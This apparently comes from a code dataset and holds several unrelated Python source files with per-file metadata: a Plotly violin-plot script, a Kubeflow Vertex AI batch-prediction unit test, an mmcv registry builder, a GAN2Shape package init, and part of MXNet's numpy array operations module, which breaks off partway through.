tickmode='linear',
tick0=0,
dtick=0.2,
),
xaxis=dict(
showline=True,
linecolor='black',
linewidth=1,
),
violinmode='overlay',
violingap=0,
paper_bgcolor='rgb(255, 255, 255)',
plot_bgcolor='rgb(255, 255, 255)',
font=dict(
size=19
),
)
# Create the graph and save the file
fig: Dict[any, any] = dict(data=data, layout=layout)
fileName: str = convertedBaseFileName.replace(
'.pdf', '_day_' + str(daysToVisualise[i]) + '.pdf')
fullPath: str = os.path.join(duringDayOutputDirectory, fileName)
py.io.write_image(fig, fullPath)
| 37.15873 | 117 | 0.576249 | import ast
import csv
import inflect
import os
import plotly as py
import sys
from typing import Any, Dict, List
folderName: str = sys.argv[1]
tag: str = sys.argv[2]
individualSatisfactions: str = sys.argv[3]
totalDaysSimulated: int = int(sys.argv[4])
totalExchangesSimulated: int = int(sys.argv[5])
daysToVisualise: List[int] = ast.literal_eval(sys.argv[6])
inflect = inflect.engine()
duringDayOutputDirectory: str = \
os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(__file__)))),
folderName
+ '/'
+ tag
+ '/images/DDDataAnalysis/EoDSD')
if not os.path.exists(duringDayOutputDirectory):
os.makedirs(duringDayOutputDirectory)
baseFileName: str = individualSatisfactions.split('/')[-1]
convertedBaseFileName: str = baseFileName.split('.')[0] + '.pdf'
days: List[str] = []
fieldNames: List[str] = ["Selfish", "Social"]
for day in range(1, totalDaysSimulated + 1):
days.append(str(day))
colours: List[str] = ['purple', 'green', 'red', 'blue']
lineTypes: List[str] = ['1px', 'solid', '15px', '5px']
with open(individualSatisfactions) as individualSatisfactionDeviations:
reader = csv.reader(individualSatisfactionDeviations)
for i in range(len(daysToVisualise)):
data: Any = []
lineType: int = 0
colour: int = 0
firstType = True
for j in range(len(fieldNames)):
satisfactions: List[float] = []
individualSatisfactionDeviations.seek(0)
next(reader)
for row in reader:
if int(row[0]) == int(daysToVisualise[i]) \
and int(row[1]) == int(j + 1):
satisfactions.append(float(row[2]))
if firstType:
data.append(
py.graph_objs.Violin(
y=satisfactions,
x0=' ',
width=1,
name=fieldNames[j],
side='negative',
line=dict(
color=colours[colour],
),
meanline_visible=True,
scalemode='count',
spanmode='hard',
points=False,
showlegend=True,
)
)
firstType = False
else:
data.append(
py.graph_objs.Violin(
y=satisfactions,
x0=' ',
width=1,
name=fieldNames[j],
side='positive',
line=dict(
color=colours[colour],
),
meanline_visible=True,
scalemode='count',
spanmode='hard',
points=False,
showlegend=True,
)
)
lineType += 1
colour += 1
day: str = inflect.number_to_words(inflect.ordinal(daysToVisualise[i]))
layout: any = dict(
title=dict(
text='Satisfaction deviation during the<br>' + day + ' day',
xanchor='center',
x=0.5,
),
yaxis=dict(
title='Average consumer satisfaction',
showline=True,
linecolor='black',
linewidth=1,
gridcolor='rgb(225, 225, 225)',
gridwidth=1,
range=[0, 1],
tickmode='linear',
tick0=0,
dtick=0.2,
),
xaxis=dict(
showline=True,
linecolor='black',
linewidth=1,
),
violinmode='overlay',
violingap=0,
paper_bgcolor='rgb(255, 255, 255)',
plot_bgcolor='rgb(255, 255, 255)',
font=dict(
size=19
),
)
fig: Dict[any, any] = dict(data=data, layout=layout)
fileName: str = convertedBaseFileName.replace(
'.pdf', '_day_' + str(daysToVisualise[i]) + '.pdf')
fullPath: str = os.path.join(duringDayOutputDirectory, fileName)
py.io.write_image(fig, fullPath)
| true | true |
f723642fef0f256789399085397280f69683b86e | 8,895 | py | Python | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | boarder7395/pipelines | ef2233291b84badef834d5ecccc8a0409462f7ab | [
"Apache-2.0"
] | null | null | null | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | boarder7395/pipelines | ef2233291b84badef834d5ecccc8a0409462f7ab | [
"Apache-2.0"
] | null | null | null | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | boarder7395/pipelines | ef2233291b84badef834d5ecccc8a0409462f7ab | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 The Kubeflow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Vertex AI Batch Prediction Job Remote Runner Client module."""
import json
from logging import raiseExceptions
import os
import time
import unittest
from unittest import mock
from google.cloud import aiplatform
from google.cloud.aiplatform.compat.types import job_state as gca_job_state
from google.protobuf import json_format
from google_cloud_pipeline_components.proto.gcp_resources_pb2 import GcpResources
from google_cloud_pipeline_components.container.experimental.gcp_launcher import batch_prediction_job_remote_runner
from google_cloud_pipeline_components.container.experimental.gcp_launcher import job_remote_runner
class BatchPredictionJobRemoteRunnerUtilsTests(unittest.TestCase):
def setUp(self):
super(BatchPredictionJobRemoteRunnerUtilsTests, self).setUp()
self._payload = (
'{"batchPredictionJob": {"displayName": '
'"BatchPredictionComponentName", "model": '
'"projects/test/locations/test/models/test-model","inputConfig":'
' {"instancesFormat": "CSV","gcsSource": {"uris": '
'["test_gcs_source"]}}, "outputConfig": {"predictionsFormat": '
'"CSV", "gcsDestination": {"outputUriPrefix": '
'"test_gcs_destination"}}}}')
self._job_type = 'BatchPredictionJob'
self._project = 'test_project'
self._location = 'test_region'
self._batch_prediction_job_name = '/projects/{self._project}/locations/{self._location}/jobs/test_job_id'
self._gcp_resources = 'gcp_resources'
self._batch_prediction_job_uri_prefix = f'https://{self._location}-aiplatform.googleapis.com/v1/'
def tearDown(self):
if os.path.exists(self._gcp_resources):
os.remove(self._gcp_resources)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
def test_batch_prediction_job_remote_runner_on_region_is_set_correctly_in_client_options(
self, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
mock_job_service_client.assert_called_once_with(
client_options={
'api_endpoint': 'test_region-aiplatform.googleapis.com'
},
client_info=mock.ANY)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_on_payload_deserializes_correctly(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
expected_parent = f'projects/{self._project}/locations/{self._location}'
expected_job_spec = json.loads(self._payload, strict=False)
job_client.create_batch_prediction_job.assert_called_once_with(
parent=expected_parent, batch_prediction_job=expected_job_spec)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_raises_exception_on_error(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_FAILED
mock_path_exists.return_value = False
with self.assertRaises(RuntimeError):
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
@mock.patch.object(time, 'sleep', autospec=True)
def test_batch_prediction_job_remote_runner_retries_to_get_status_on_non_completed_job(
self, mock_time_sleep, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response_success = mock.Mock()
get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
get_batch_prediction_job_response_running = mock.Mock()
get_batch_prediction_job_response_running.state = gca_job_state.JobState.JOB_STATE_RUNNING
job_client.get_batch_prediction_job.side_effect = [
get_batch_prediction_job_response_running,
get_batch_prediction_job_response_success
]
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
mock_time_sleep.assert_called_once_with(
job_remote_runner._POLLING_INTERVAL_IN_SECONDS)
self.assertEqual(job_client.get_batch_prediction_job.call_count, 2)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_returns_gcp_resources(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response_success = mock.Mock()
get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
job_client.get_batch_prediction_job.side_effect = [
get_batch_prediction_job_response_success
]
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
with open(self._gcp_resources) as f:
serialized_gcp_resources = f.read()
# Instantiate GCPResources Proto
batch_prediction_job_resources = json_format.Parse(
serialized_gcp_resources, GcpResources())
self.assertEqual(len(batch_prediction_job_resources.resources), 1)
batch_prediction_job_name = batch_prediction_job_resources.resources[
0].resource_uri[len(self._batch_prediction_job_uri_prefix):]
self.assertEqual(batch_prediction_job_name,
self._batch_prediction_job_name)
| 45.152284 | 115 | 0.793479 |
import json
from logging import raiseExceptions
import os
import time
import unittest
from unittest import mock
from google.cloud import aiplatform
from google.cloud.aiplatform.compat.types import job_state as gca_job_state
from google.protobuf import json_format
from google_cloud_pipeline_components.proto.gcp_resources_pb2 import GcpResources
from google_cloud_pipeline_components.container.experimental.gcp_launcher import batch_prediction_job_remote_runner
from google_cloud_pipeline_components.container.experimental.gcp_launcher import job_remote_runner
class BatchPredictionJobRemoteRunnerUtilsTests(unittest.TestCase):
def setUp(self):
super(BatchPredictionJobRemoteRunnerUtilsTests, self).setUp()
self._payload = (
'{"batchPredictionJob": {"displayName": '
'"BatchPredictionComponentName", "model": '
'"projects/test/locations/test/models/test-model","inputConfig":'
' {"instancesFormat": "CSV","gcsSource": {"uris": '
'["test_gcs_source"]}}, "outputConfig": {"predictionsFormat": '
'"CSV", "gcsDestination": {"outputUriPrefix": '
'"test_gcs_destination"}}}}')
self._job_type = 'BatchPredictionJob'
self._project = 'test_project'
self._location = 'test_region'
self._batch_prediction_job_name = '/projects/{self._project}/locations/{self._location}/jobs/test_job_id'
self._gcp_resources = 'gcp_resources'
self._batch_prediction_job_uri_prefix = f'https://{self._location}-aiplatform.googleapis.com/v1/'
def tearDown(self):
if os.path.exists(self._gcp_resources):
os.remove(self._gcp_resources)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
def test_batch_prediction_job_remote_runner_on_region_is_set_correctly_in_client_options(
self, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
mock_job_service_client.assert_called_once_with(
client_options={
'api_endpoint': 'test_region-aiplatform.googleapis.com'
},
client_info=mock.ANY)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_on_payload_deserializes_correctly(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
expected_parent = f'projects/{self._project}/locations/{self._location}'
expected_job_spec = json.loads(self._payload, strict=False)
job_client.create_batch_prediction_job.assert_called_once_with(
parent=expected_parent, batch_prediction_job=expected_job_spec)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_raises_exception_on_error(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_FAILED
mock_path_exists.return_value = False
with self.assertRaises(RuntimeError):
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
@mock.patch.object(time, 'sleep', autospec=True)
def test_batch_prediction_job_remote_runner_retries_to_get_status_on_non_completed_job(
self, mock_time_sleep, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response_success = mock.Mock()
get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
get_batch_prediction_job_response_running = mock.Mock()
get_batch_prediction_job_response_running.state = gca_job_state.JobState.JOB_STATE_RUNNING
job_client.get_batch_prediction_job.side_effect = [
get_batch_prediction_job_response_running,
get_batch_prediction_job_response_success
]
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
mock_time_sleep.assert_called_once_with(
job_remote_runner._POLLING_INTERVAL_IN_SECONDS)
self.assertEqual(job_client.get_batch_prediction_job.call_count, 2)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_returns_gcp_resources(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response_success = mock.Mock()
get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
job_client.get_batch_prediction_job.side_effect = [
get_batch_prediction_job_response_success
]
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources)
with open(self._gcp_resources) as f:
serialized_gcp_resources = f.read()
batch_prediction_job_resources = json_format.Parse(
serialized_gcp_resources, GcpResources())
self.assertEqual(len(batch_prediction_job_resources.resources), 1)
batch_prediction_job_name = batch_prediction_job_resources.resources[
0].resource_uri[len(self._batch_prediction_job_uri_prefix):]
self.assertEqual(batch_prediction_job_name,
self._batch_prediction_job_name)
| true | true |
f723644d5ba0725447dbdcb5d493e4a75f71dbeb | 763 | py | Python | davarocr/davarocr/davar_rcg/core/converter/builder.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | 387 | 2021-01-02T07:50:15.000Z | 2022-03-31T04:30:03.000Z | davarocr/davarocr/davar_rcg/core/converter/builder.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | 70 | 2021-05-04T18:28:18.000Z | 2022-03-31T14:14:52.000Z | davarocr/davarocr/davar_rcg/core/converter/builder.py | icedream2/DAVAR-Lab-OCR | c8b82f45516850eeadcab2739fb2a4292f2fdca1 | [
"Apache-2.0"
] | 83 | 2021-01-05T08:28:26.000Z | 2022-03-31T07:14:03.000Z | """
##################################################################################################
# Copyright Info : Copyright (c) Davar Lab @ Hikvision Research Institute. All rights reserved.
# Filename : builder.py
# Abstract :
# Current Version: 1.0.0
# Date : 2020-05-31
##################################################################################################
"""
from mmcv.utils import Registry, build_from_cfg
CONVERTER = Registry('converter')
def build_converter(cfg):
"""
Args:
cfg (config): model config):
Returns:
build the converter
"""
assert 'type' in cfg and isinstance(cfg['type'], str)
converter = build_from_cfg(cfg, CONVERTER)
return converter
| 26.310345 | 98 | 0.461337 | from mmcv.utils import Registry, build_from_cfg
CONVERTER = Registry('converter')
def build_converter(cfg):
assert 'type' in cfg and isinstance(cfg['type'], str)
converter = build_from_cfg(cfg, CONVERTER)
return converter
| true | true |
f72364784036bde554a49495f1294fef3facd59c | 91 | py | Python | gan2shape/__init__.py | PeterouZh/GAN2Shape | ea077e543a3fb824ce06385e8a837dcbae8e9aaa | [
"MIT"
] | 421 | 2020-11-03T01:58:39.000Z | 2022-03-26T15:09:21.000Z | gan2shape/__init__.py | karandeepdps/GAN2Shape | 09882aed3526c8cee42c30beb5a67977e311bb08 | [
"MIT"
] | 41 | 2020-11-09T09:20:24.000Z | 2022-03-27T10:15:38.000Z | gan2shape/__init__.py | karandeepdps/GAN2Shape | 09882aed3526c8cee42c30beb5a67977e311bb08 | [
"MIT"
] | 73 | 2020-11-03T04:04:55.000Z | 2022-03-24T03:41:38.000Z | from .utils import setup_runtime
from .trainer import Trainer
from .model import GAN2Shape
| 22.75 | 32 | 0.835165 | from .utils import setup_runtime
from .trainer import Trainer
from .model import GAN2Shape
| true | true |
f723653996386d4bb9b6bb522231bb66a1d58853 | 246,891 | py | Python | python/mxnet/ndarray/numpy/_op.py | ThomasGmeinder/incubator-mxnet | 49292cef7c85dbe00abc3a6e79cb70644f753d6f | [
"Apache-2.0"
] | null | null | null | python/mxnet/ndarray/numpy/_op.py | ThomasGmeinder/incubator-mxnet | 49292cef7c85dbe00abc3a6e79cb70644f753d6f | [
"Apache-2.0"
] | 2 | 2021-12-10T01:52:29.000Z | 2021-12-14T22:00:17.000Z | python/mxnet/ndarray/numpy/_op.py | Samuel-wei/incubator-mxnet | 0f3c5da37bf1647e18fce26beb9f06f5d6183846 | [
"BSL-1.0",
"Apache-2.0"
] | null | null | null | # pylint: disable=C0302
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-argument
"""Namespace for numpy operators used in Gluon dispatched by F=ndarray."""
import numpy as _np
from ...base import numeric_types, integer_types
from ...util import _sanity_check_params, set_module
from ...util import wrap_np_unary_func, wrap_np_binary_func
from ...context import current_context
from . import _internal as _npi
from ..ndarray import NDArray
__all__ = ['shape', 'zeros', 'zeros_like', 'ones', 'ones_like', 'full', 'full_like', 'empty_like', 'invert', 'delete',
'add', 'broadcast_to', 'subtract', 'multiply', 'divide', 'mod', 'remainder', 'power', 'bitwise_not',
'arctan2', 'sin', 'cos', 'tan', 'sinh', 'cosh', 'tanh', 'log10', 'sqrt', 'cbrt', 'abs', 'insert',
'absolute', 'exp', 'expm1', 'arcsin', 'arccos', 'arctan', 'sign', 'log', 'degrees', 'log2', 'matmul',
'log1p', 'rint', 'radians', 'reciprocal', 'square', 'negative', 'fix', 'ceil', 'floor', 'histogram',
'trunc', 'logical_not', 'arcsinh', 'arccosh', 'arctanh', 'argsort', 'sort',
'tensordot', 'eye', 'linspace',
'logspace', 'expand_dims', 'tile', 'arange', 'array_split', 'split', 'hsplit', 'vsplit', 'dsplit',
'concatenate', 'append', 'stack', 'vstack', 'row_stack', 'column_stack', 'hstack', 'dstack',
'average', 'mean', 'maximum', 'minimum',
'swapaxes', 'clip', 'argmax', 'argmin', 'std', 'var', 'indices', 'copysign', 'ravel', 'unravel_index',
'diag_indices_from', 'hanning', 'hamming', 'blackman', 'flip', 'flipud', 'fliplr', 'around', 'round',
'hypot', 'bitwise_and', 'bitwise_xor', 'bitwise_or', 'rad2deg', 'deg2rad', 'unique', 'lcm',
'tril', 'identity', 'take', 'ldexp', 'vdot', 'inner', 'outer',
'equal', 'not_equal', 'greater', 'less', 'greater_equal', 'less_equal', 'rot90', 'einsum',
'true_divide', 'nonzero', 'quantile', 'percentile', 'shares_memory', 'may_share_memory',
'diff', 'resize', 'polyval', 'nan_to_num', 'isnan', 'isinf', 'isposinf', 'isneginf', 'isfinite',
'where', 'bincount']
@set_module('mxnet.ndarray.numpy')
def shape(a):
"""
Return the shape of an array.
Parameters
----------
a : array_like
Input array.
Returns
-------
shape : tuple of ints
The elements of the shape tuple give the lengths of the
corresponding array dimensions.
See Also
--------
ndarray.shape : Equivalent array method.
Examples
--------
>>> np.shape(np.eye(3))
(3, 3)
>>> np.shape([[1, 2]])
(1, 2)
>>> np.shape([0])
(1,)
>>> np.shape(0)
()
"""
return a.shape
@set_module('mxnet.ndarray.numpy')
def zeros(shape, dtype=_np.float32, order='C', ctx=None): # pylint: disable=redefined-outer-name
"""Return a new array of given shape and type, filled with zeros.
This function currently only supports storing multi-dimensional data
in row-major (C-style).
Parameters
----------
shape : int or tuple of int
The shape of the empty array.
dtype : str or numpy.dtype, optional
An optional value type. Default is `numpy.float32`. Note that this
behavior is different from NumPy's `zeros` function where `float64`
is the default value, because `float32` is considered as the default
data type in deep learning.
order : {'C'}, optional, default: 'C'
How to store multi-dimensional data in memory, currently only row-major
(C-style) is supported.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray
Array of zeros with the given shape, dtype, and ctx.
"""
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
dtype = _np.float32 if dtype is None else dtype
return _npi.zeros(shape=shape, ctx=ctx, dtype=dtype)
@set_module('mxnet.ndarray.numpy')
def ones(shape, dtype=_np.float32, order='C', ctx=None): # pylint: disable=redefined-outer-name
"""Return a new array of given shape and type, filled with ones.
This function currently only supports storing multi-dimensional data
in row-major (C-style).
Parameters
----------
shape : int or tuple of int
The shape of the empty array.
dtype : str or numpy.dtype, optional
An optional value type. Default is `numpy.float32`. Note that this
behavior is different from NumPy's `ones` function where `float64`
is the default value, because `float32` is considered as the default
data type in deep learning.
order : {'C'}, optional, default: 'C'
How to store multi-dimensional data in memory, currently only row-major
(C-style) is supported.
ctx : Context, optional
An optional device context (default is the current default context).
Returns
-------
out : ndarray
Array of ones with the given shape, dtype, and ctx.
"""
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
dtype = _np.float32 if dtype is None else dtype
return _npi.ones(shape=shape, ctx=ctx, dtype=dtype)
# pylint: disable=too-many-arguments, redefined-outer-name
@set_module('mxnet.ndarray.numpy')
def zeros_like(a, dtype=None, order='C', ctx=None, out=None):
"""
Return an array of zeros with the same shape and type as a given array.
Parameters
----------
a : ndarray
The shape and data-type of `a` define these same attributes of
the returned array.
dtype : data-type, optional
Overrides the data type of the result.
Temporarily do not support boolean type.
order : {'C'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. Currently only supports C order.
ctx: to specify the device, e.g. the i-th GPU.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Array of zeros with the same shape and type as a.
See Also
--------
empty_like : Return an empty array with shape and type of input.
ones_like : Return an array of ones with shape and type of input.
zeros_like : Return an array of zeros with shape and type of input.
full : Return a new array of given shape filled with value.
Examples
--------
>>> x = np.arange(6)
>>> x = x.reshape((2, 3))
>>> x
array([[0., 1., 2.],
[3., 4., 5.]])
>>> np.zeros_like(x)
array([[0., 0., 0.],
[0., 0., 0.]])
>>> np.zeros_like(x, int)
array([[0, 0, 0],
[0, 0, 0]], dtype=int64)
>>> y = np.arange(3, dtype=float)
>>> y
array([0., 1., 2.], dtype=float64)
>>> np.zeros_like(y)
array([0., 0., 0.], dtype=float64)
"""
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
return _npi.full_like(a, fill_value=0, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def ones_like(a, dtype=None, order='C', ctx=None, out=None):
"""
Return an array of ones with the same shape and type as a given array.
Parameters
----------
a : ndarray
The shape and data-type of `a` define these same attributes of
the returned array.
dtype : data-type, optional
Overrides the data type of the result.
Temporarily do not support boolean type.
order : {'C'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. Currently only supports C order.
ctx: to specify the device, e.g. the i-th GPU.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Array of ones with the same shape and type as a.
See Also
--------
empty_like : Return an empty array with shape and type of input.
zeros_like : Return an array of zeros with shape and type of input.
full_like : Return a new array with shape of input filled with value.
ones : Return a new array setting values to one.
Examples
--------
>>> x = np.arange(6)
>>> x = x.reshape((2, 3))
>>> x
array([[0., 1., 2.],
[3., 4., 5.]])
>>> np.ones_like(x)
array([[1., 1., 1.],
[1., 1., 1.]])
>>> np.ones_like(x, int)
array([[1, 1, 1],
[1, 1, 1]], dtype=int64)
>>> y = np.arange(3, dtype=float)
>>> y
array([0., 1., 2.], dtype=float64)
>>> np.ones_like(y)
array([1., 1., 1.], dtype=float64)
"""
if order != 'C':
raise NotImplementedError
if ctx is None:
ctx = current_context()
return _npi.full_like(a, fill_value=1, dtype=dtype, ctx=ctx, out=out)
@set_module('mxnet.ndarray.numpy')
def broadcast_to(array, shape):
"""
Broadcast an array to a new shape.
Parameters
----------
array : ndarray or scalar
The array to broadcast.
shape : tuple
The shape of the desired array.
Returns
-------
broadcast : array
A readonly view on the original array with the given shape. It is
typically not contiguous. Furthermore, more than one element of a
broadcasted array may refer to a single memory location.
Raises
------
MXNetError
If the array is not compatible with the new shape according to NumPy's
broadcasting rules.
"""
if _np.isscalar(array):
return full(shape, array)
return _npi.broadcast_to(array, shape)
@set_module('mxnet.ndarray.numpy')
def full(shape, fill_value, dtype=None, order='C', ctx=None, out=None): # pylint: disable=too-many-arguments
"""
Return a new array of given shape and type, filled with `fill_value`.
Parameters
----------
shape : int or sequence of ints
Shape of the new array, e.g., ``(2, 3)`` or ``2``.
fill_value : scalar or ndarray
Fill value.
dtype : data-type, optional
The desired data-type for the array. The default, `None`, means
`np.array(fill_value).dtype`.
order : {'C'}, optional
Whether to store multidimensional data in C- or Fortran-contiguous
(row- or column-wise) order in memory. Currently only supports C order.
ctx: to specify the device, e.g. the i-th GPU.
out : ndarray or None, optional
A location into which the result is stored.
If provided, it must have the same shape and dtype as input ndarray.
If not provided or `None`, a freshly-allocated array is returned.
Returns
-------
out : ndarray
Array of `fill_value` with the given shape, dtype, and order.
If `fill_value` is an ndarray, out will have the same context as `fill_value`
regardless of the provided `ctx`.
Notes
-----
This function differs from the original `numpy.full
https://docs.scipy.org/doc/numpy/reference/generated/numpy.full.html`_ in
the following way(s):
- Have an additional `ctx` argument to specify the device
- Have an additional `out` argument
- Currently does not support `order` selection
See Also
--------
empty : Return a new uninitialized array.
ones : Return a new array setting values to one.
zeros : Return a new array setting values to zero.
Examples
--------
>>> np.full((2, 2), 10)
array([[10., 10.],
[10., 10.]])
>>> np.full((2, 2), 2, dtype=np.int32, ctx=mx.cpu(0))
array([[2, 2],
